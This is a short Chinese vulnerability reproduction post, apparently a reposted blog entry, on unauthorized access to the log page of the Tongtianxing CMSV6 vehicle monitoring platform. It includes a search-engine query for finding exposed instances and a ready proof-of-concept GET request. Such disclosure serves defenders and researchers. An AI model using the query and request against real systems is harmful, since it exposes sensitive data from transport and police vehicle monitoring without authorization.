【漏洞复现】通天星CMSV6车载监控平台未授权访问漏洞

发布时间:2024年01月06日

Nx01 产品简介

? ? ? ? 深圳市通天星科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。

Nx02 漏洞描述

????????通天星车载视频监控平台软件LoggerManagement/logIndex.html功能页面未进行有效鉴权操作,导致攻击者可以未授权获取敏感信息。

Nx03 产品主页

hunter-query: web.body="/808gps/"

Nx04 漏洞复现

POC:

GET /808gps/LoggerManagement/logIndex.html HTTP/1.1
Host: {{Hostname}}
Accept: */*

Nx05 修复建议

建议联系软件厂商进行处理。

文章来源:https://blog.csdn.net/qq_37113223/article/details/135410451
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。